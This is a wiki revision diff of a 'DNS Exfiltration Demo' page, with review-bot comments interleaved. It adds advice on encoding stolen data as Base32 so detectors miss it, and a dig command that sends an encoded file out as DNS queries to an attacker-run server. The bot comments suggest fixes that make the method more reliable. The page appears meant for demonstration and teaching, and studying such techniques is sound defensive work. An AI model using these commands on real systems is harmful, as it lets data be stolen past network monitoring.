dns:dns_exfiltration

dns:dns_exfiltration [2023/10/02 15:11] – [Simple Exfiltration] bstafford
dns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
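Review bot: the new `===== Base64 =====` heading uses the same heading level as the page title `===== DNS Exfiltration Demo =====`, so it renders as a sibling of the whole demo rather than a subsection of it; `==== Base64 ====` would nest it under the demo. The added text also justifies avoiding Base64 only on detectability ("'normal' DNS doesn't use these"); it is worth adding that DNS names are case-insensitive and resolvers may alter letter case in transit, so the uppercase letters Base64 depends on are not guaranteed to survive, and that `=` and `/` fall outside the letters, digits and hyphen set that most resolvers and tools accept for hostnames, which is the stronger reason behind the page's own "Use Base32 instead" advice. The two trailing empty `+` lines only add blank lines ahead of the existing blank context and can be dropped.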
Line 42: Line 48:
 # The result is a file that contains a huge list of FQDN's for us to query (exfiltrate) # The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
  
-for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done+# Exfiltrate the file with DIG. 
 +dig +short A @$LOCALDNS -f $ENCRYPTED 
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
-# OR - Use DIG to iterate over the file and resolve the DNS at full speed. 
-#dig +short A @$LOCALDNS -f $ENCRYPTED 
  
 ## The following commands get run on the command auth DNS server. ## The following commands get run on the command auth DNS server.
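Review bot: the new `dig +short A @$LOCALDNS -f $ENCRYPTED` line leaves `$LOCALDNS` and `$ENCRYPTED` unquoted, and the retained (commented-out) loop has the same problem plus the `$(cat $ENCRYPTED)` word-splitting idiom; `dig +short A @"$LOCALDNS" -f "$ENCRYPTED"` and `while read -r i; do dig +short A @"$LOCALDNS" "$i"; sleep 0.1; done < "$ENCRYPTED"` are the robust forms. The replacement comment `# Delay if required.` also says less than the removed `# OR - Use DIG to iterate over the file and resolve the DNS at full speed.` did: it should state that the commented loop issues one query per line with a 0.1 s pause whereas `-f` batch mode sends every line as fast as dig can, so a reader knows what the two variants actually differ in. Both lines also carry trailing whitespace.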
dns/dns_exfiltration.1696259489.txt.gz · Last modified: by bstafford